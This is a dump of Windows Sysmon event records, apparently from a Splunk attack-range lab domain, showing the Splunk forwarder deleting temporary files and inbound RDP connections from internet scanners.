15:00:14.589{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C502F5A0217E055DEAB1F49AF89EA522,SHA256=00DFD29997FBB29323D5C5A9D0B7587FA6EE4418078FA26492BDA719F81F239E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051003Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:14.030{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7947F324D53D186348DB1DA25645C5C7,SHA256=88002EC9E56587FC1C38AEC1ABFC22322EBAA321EF24FD5FCE1D47A7F9ECDF32,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:14.224{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54672-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:13.723{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com64650-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:15.636{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCBC6ED3703885A5C720202D2671F4D,SHA256=00803CC4457E6D60B4AA6FBEB75A55B19ED8150789CA5D635C6E2FE1653E7AF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:15.214{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC73AAC01B5EDD9E2509D60EBAA10309,SHA256=6B3D41D80CF2617A9121606968295EE7BFD354E59E0F434DFD175827F97C2826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051006Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:15.593{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F2F9448B6042CBB5151E16B30AFD50A8,SHA256=7C38B7C67DCDC771B61649ECBEA92D3476A11243D19E4AA4D8A77502B4EB83E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051005Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:12.904{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50268-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051004Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:15.077{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=813086F3AFCACF89C72505CD65624BC7,SHA256=434AE43AD54CE332FCFD7ED2190F348DCC744E3D899F0A8A25F37C14D9915A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:16.839{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C89433D0F54F5550C4792A3590B1B8,SHA256=EDF7D7A17BB2121D98DCC4995331C693A599069368758351F8677335B907A364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:16.745{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCE9244D820592FCB55D583E968AB3D,SHA256=751C83E0A2B9EAA4A8A8E6E0E929CD8BBE28B1206C167B6F004794D794216F67,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:14.610{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5373-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051012Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:16.843{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=755A1963F05CA4AD8FE1B77463C71962,SHA256=328E76AF8069E4CB7AD0162EA6DB8BEED6719ECE76FA0D0FAD3901E350AEAB05,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051011Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:14.468{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51743-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051010Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:14.305{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-65176-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051009Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:14.068{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com49771-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051008Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:13.958{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55295-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051007Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:16.171{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC68D3DDB60F7430C07963CB256AD46F,SHA256=EBD7374B06662D0AE935449519CB439455C3AD1CAC4C740C04BDC8F03E759F54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:17.902{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CBEFA90AF4CCD1696EB1DD3C86ECDEA,SHA256=F04EC1443250CE710B68DE82773C85B361A07177CC1C6C1D209EDD24BAA4FB2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:17.761{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8235303DFF11236E201D7A4BC06AE14,SHA256=DC8CAF2BD4F064147AA35F33151C622E931867B75E7B5CF4352BB6B915DA22D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:16.157{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-4014-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:16.123{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6731-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000051014Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:15.698{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52560-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051013Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:17.233{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=752B88A9854CC5390C20ACE0E0BA2D7A,SHA256=3E2775AA134C32C190320F37CEDBBE6150F2E71965E422B2CB8BC1A94B858CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:18.777{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFF7B60D6CAB266B009DD6AB6C904629,SHA256=EF268E2A4BF72C82A5F0B863155FE7E7A436C3691774A4BC08FCAF9DD40423FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:17.545{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-8088-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051016Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:18.265{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6BFF7A8CA38D7087BA2B880559612E,SHA256=1FA8F4B9072B8354B24302EAC9933CCE0ABF6929A2EAF4DAFD98F6F08EEAF1AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051015Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:18.077{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B052444864CF5D9930336AEB1BAD829,SHA256=F061A38A491B5999215799F22AFFDDE885300C4B31E7ED23AAC3091D8445ED34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:19.792{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=596F09DFF786E0594E27E9B752968E3E,SHA256=2D2D480DB056F0BA0768108D3564FF012D8D7AC649F2AA16D14A4F5138734F58,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:18.294{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57668-false10.0.1.12-8000- 354300x800000000000000082336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:17.832{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com55446-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:19.136{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DE79FCB7115DAF8075B20CA4A2AA0E8,SHA256=6AC15C87BFD59B795D51AB999D09F9E4BF6910F8A334ACFC1B686E6F7E231D70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051017Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:19.265{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63D69326CC166EF305C7FF85EEAEC3C5,SHA256=B3263A780B51B794A8579045736619715B60792D47B97C6059A00A8EA28757E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:20.808{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3FF53E26F4C39F101ECCF49FBB75087,SHA256=3250DBC214EF454FEBA669ACE26EEF0AA7A7D888C6AB7A9098B0DABA5884265B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051018Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:20.280{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C33639BCE91A1FF11C7008BA494FE491,SHA256=333F1CF1C3B988A14DBA8905F7BEF24A8B40000DE1BBD8E451BCEA9C893647C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:21.823{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D48F8766290579BA21B16B8931546B0,SHA256=D27C1D423603D743A1A558D9C6A102FB341F99488D3DF6A59A7A3CB28E097C6B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051022Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:19.208{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53214-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000051021Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:18.285{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54681-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051020Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:21.296{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F52C7914B1D2219B937D845852982EAC,SHA256=538CC650AA9880F65887841431E1CDDCD75B77F99AD00913D039AC44C0CC627C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051019Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:21.093{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7A60E754B96D136BFDE5CC8632CDAAFD,SHA256=E4E78267A27E306567600405C036E484E0F67A24CCE57D7E86A6563BB7F21D46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:22.886{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A212E0094738D68E093D8FEB6F69C21,SHA256=A8499613A58CEC36E3874A759C9106A929089BBB443F5462CA1A9D88E8D4D87B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:21.094{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49311-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000082341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:22.698{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AE7345E61BF0704D5D9B8B22E775CE8,SHA256=0B3D7CFAE86E2EC2AFA7651C9CE8A7D92AAADD2BC496B808ABC7750DD8FE2902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051025Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:22.436{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B69BFA9E25B426AC90917574016F52A,SHA256=76838DBC4A2E1A1A752D9BD707E6404A54049385280098AFB5816E29447F322C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051024Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:19.793{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56149-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051023Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:22.311{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEB90C59D001BD37296D430223851888,SHA256=DF40EFD6D7BF768E66E3BC8F4CF537CF1A426869FB7611DDB910A9276BD61F5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:23.901{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AA66490CCAFEA3CB4E95C79110BF3A0,SHA256=5E1B0387071BD844A78D96AAD03C59EBBFAA0FEE50584ACD0312641D17ADED10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:23.839{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=00607E06D73A197A9F1BF604D86C6900,SHA256=1F4E82311C2E256961EDB850F75D0081FD9C34A84ABE4ACEE2DF3BC151DFD502,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:22.069{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9446-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:21.799{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com59140-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000051028Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:23.843{85C0FFC9-B85C-607E-9700-00000000BB01}3076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=F985E1E51BD4FEB45E4931E1523E80EA,SHA256=E168C793E8F8BB7D1EAC66F2B963AAC5E0DD0FE2CCEBAB9CCFC61E8C70CE4293,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051027Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:20.745{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52561-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000051026Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:23.327{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8E6F595BA536AFBB0D3C5985660877,SHA256=EFABED8534E4D21271734C91C0EDF37C0BBC038D80DF869B32AC501416B18992,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051031Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:22.417{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49865-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000051030Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:24.343{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4F6B84D212710449A01C5411BF70A31,SHA256=7FBDB14400DD6B5DDFBAA63CC37E75A509AD05349CE5DB0AF81369574132A553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000051029Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:24.015{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A208AAD2A1826038FA69DF6D3EC876,SHA256=6D94D6229A4E0D69AE46C8BA9791BBD71C595E3A65EC0FFEB358F9FCAA78C6F7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:24.200{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57669-false10.0.1.12-8000- 23542300x800000000000000082349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:25.667{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=2997B59DA4BBA1AB848ACC79DFE02D5B,SHA256=9B57B199253B72A38CFDDEB45751779A46440AE4010EF464D1226D65E0743FB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:25.042{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=204E8A7F287AE48D60F8D7B19AB9CD6E,SHA256=1DD0E0471871A508C070CF08919E1DC0DB46E1127A9C359E12AC0D27F520893E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000051033Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:22.756{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62006-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 